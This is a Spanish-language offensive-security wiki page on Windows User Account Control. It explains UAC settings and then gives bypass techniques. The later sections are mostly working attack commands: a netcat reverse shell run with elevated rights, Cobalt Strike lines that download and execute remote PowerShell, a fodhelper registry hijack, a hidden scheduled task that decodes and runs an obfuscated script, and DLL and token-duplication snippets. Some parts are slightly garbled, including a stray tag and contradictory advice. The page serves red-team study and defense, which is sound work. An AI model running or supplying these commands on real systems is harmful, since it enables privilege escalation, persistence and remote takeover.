UAC - User Account Control

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Revisa el catálogo completo de HackTricks Training para las rutas de evaluación (ARTA/GRTA/AzRTA) y Linux Hacking Expert (LHE).

Apoya a HackTricks

• Revisa los planes de suscripción!
• Únete al 💬 grupo de Discord, al grupo de telegram, sigue @hacktricks_live en X/Twitter, o revisa la página de LinkedIn y el canal de YouTube.
• Comparte hacking tricks enviando PRs a los repositorios de github HackTricks y HackTricks Cloud.

UAC

User Account Control (UAC) es una feature que habilita un consent prompt para actividades elevadas. Las applications tienen distintos niveles de integrity, y un programa con un nivel alto puede realizar tareas que podrían comprometer potencialmente el sistema. Cuando UAC está habilitado, las applications y tasks siempre se ejecutan bajo el security context de una cuenta no administradora a menos que un administrador autorice explícitamente a estas applications/tasks a tener acceso de nivel administrador al sistema para ejecutarse. Es una feature de conveniencia que protege a los administradores de cambios no intencionados, pero no se considera una security boundary.

Para más info sobre integrity levels:

Integrity Levels

Cuando UAC está presente, a un usuario administrador se le dan 2 tokens: una clave de usuario estándar, para realizar acciones normales como nivel regular, y otra con los privilegios de admin.

Esta page analiza en gran profundidad cómo funciona UAC e incluye el proceso de logon, la experiencia de usuario y la arquitectura de UAC. Los administradores pueden usar security policies para configurar cómo funciona UAC de forma específica para su organización a nivel local (usando secpol.msc), o configurarlo y distribuirlo mediante Group Policy Objects (GPO) en un entorno de dominio de Active Directory. Los distintos ajustes se analizan en detalle aquí. Hay 10 Group Policy settings que se pueden establecer para UAC. La siguiente tabla proporciona más detalle:

Policies for installing software on Windows

Las local security policies (“secpol.msc” en la mayoría de los sistemas) están configuradas por defecto para impedir que los usuarios no admin realicen instalaciones de software. Esto significa que incluso si un usuario no admin puede descargar el installer de tu software, no podrá ejecutarlo sin una cuenta de admin.

Registry Keys to Force UAC to Ask for Elevation

Como usuario estándar sin privilegios de admin, puedes asegurarte de que la cuenta “standard” sea solicitada por UAC para introducir credenciales cuando intente realizar ciertas acciones. Esta acción requeriría modificar ciertas registry keys, para lo cual necesitas permisos de admin, a menos que exista un UAC bypass, o que el atacante ya haya iniciado sesión como admin.

Incluso si el usuario está en el grupo Administrators, estos cambios obligan al usuario a volver a introducir las credenciales de su cuenta para realizar acciones administrativas.

La única desventaja es que este enfoque necesita que UAC esté deshabilitado para funcionar, lo cual es poco probable que ocurra en entornos de producción.

Las registry keys y entradas que debes cambiar son las siguientes (con sus valores por defecto entre paréntesis):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

Esto también se puede hacer manualmente a través de la herramienta Local Security Policy. Una vez cambiado, las operaciones administrativas le piden al usuario que vuelva a introducir sus credenciales.

Note

User Account Control no es una security boundary. Por lo tanto, los usuarios estándar no pueden salir de sus cuentas y obtener derechos de administrador sin un local privilege escalation exploit.

Ask for ‘full computer access’ to a user

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

Privilegios UAC

• Internet Explorer Protected Mode usa comprobaciones de integridad para impedir que procesos de alto nivel de integridad (como los navegadores web) accedan a datos de bajo nivel de integridad (como la carpeta de archivos temporales de Internet). Esto se hace ejecutando el navegador con un token de baja integridad. Cuando el navegador intenta acceder a datos almacenados en la zona de baja integridad, el sistema operativo comprueba el nivel de integridad del proceso y permite el acceso en consecuencia. Esta función ayuda a evitar que los ataques de ejecución remota de código obtengan acceso a datos sensibles en el sistema.
• Cuando un usuario inicia sesión en Windows, el sistema crea un access token que contiene una lista de los privilegios del usuario. Los privilegios se definen como la combinación de los derechos y capacidades de un usuario. El token también contiene una lista de las credenciales del usuario, que son credenciales que se usan para autenticar al usuario frente al equipo y frente a recursos de la red.

Autoadminlogon

Para configurar Windows para que inicie sesión automáticamente con un usuario específico al arrancar, establece la AutoAdminLogon registry key. Esto es útil para entornos de kiosk o con fines de prueba. Úsalo solo en sistemas seguros, ya que expone la contraseña en el registry.

Establece las siguientes claves usando el Registry Editor o reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

Para revertir al comportamiento normal de inicio de sesión, establece AutoAdminLogon en 0.

UAC bypass

Tip

Ten en cuenta que si tienes acceso gráfico a la víctima, UAC bypass es directo, ya que simplemente puedes hacer clic en “Yes” cuando aparezca el aviso de UAC

El UAC bypass es necesario en la siguiente situación: UAC está activado, tu proceso se ejecuta en un contexto de integridad media, y tu usuario pertenece al grupo de administrators.

Es importante mencionar que es mucho más difícil bypass the UAC si está en el nivel de seguridad más alto (Always) que si está en cualquiera de los otros niveles (Default).

UAC disabled

Si UAC ya está deshabilitado (ConsentPromptBehaviorAdmin es 0) puedes ejecutar una reverse shell con privilegios de admin (high integrity level) usando algo como:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Very Basic UAC “bypass” (full file system access)

Si tienes una shell con un usuario que está dentro del grupo Administrators, puedes montar el recurso compartido C$ vía SMB (file system) local en un nuevo disco y tendrás access to everything inside the file system (incluso la carpeta home de Administrator).

Warning

Parece que este truco ya no funciona

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

Bypass de UAC con cobalt strike

Las técnicas de Cobalt Strike solo funcionarán si UAC no está configurado en su nivel máximo de seguridad

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire y Metasploit también tienen varios módulos para bypass de UAC.

KRBUACBypass

Documentación y herramienta en https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME que es una compilation de varios UAC bypass exploits. Ten en cuenta que tendrás que compile UACME usando visual studio o msbuild. La compilación creará varios ejecutables (como Source\Akagi\outout\x64\Debug\Akagi.exe) , necesitarás saber cuál necesitas.
Debes tener cuidado porque algunos bypasses promtp a otros programas que alertarán al usuario de que algo está ocurriendo.

UACME tiene la build version a partir de la cual cada técnica empezó a funcionar. Puedes buscar una técnica que afecte a tus versiones:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

También, usando this page obtienes la versión de Windows 1607 a partir de las build versions.

UAC Bypass – fodhelper.exe (Registry hijack)

El binario de confianza fodhelper.exe se auto-elevated en Windows modernos. Cuando se inicia, consulta la ruta del registry por usuario de abajo sin validar el verbo DelegateExecute. Plantar un command ahí permite que un proceso Medium Integrity (el usuario está en Administrators) cree un proceso High Integrity sin un UAC prompt.

Registry path queried by fodhelper:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Notas:
- Funciona cuando el usuario actual es miembro de Administrators y el nivel de UAC es el predeterminado/lenient (no Always Notify con restricciones extra).
- Usa la ruta `sysnative` para iniciar un PowerShell de 64 bits desde un proceso de 32 bits en Windows de 64 bits.
- El payload puede ser cualquier comando (PowerShell, cmd, o una ruta a un EXE). Evita prompts de UI para stealth.

#### Variante de hijack de CurVer/extension (solo HKCU)

Muestras recientes que abusan de `fodhelper.exe` evitan `DelegateExecute` y en su lugar **redirigen el ProgID `ms-settings`** mediante el valor `CurVer` por usuario. El binario autoelevado aún resuelve el handler bajo `HKCU`, así que no se necesita un token de admin para plantar las keys:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

copy iscsiexe.dll %TEMP%\iscsiexe.dll
reg add "HKCU\Environment" /v Path /t REG_SZ /d "%TEMP%" /f
C:\Windows\System32\cmd.exe /c C:\Windows\SysWOW64\iscsicpl.exe

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"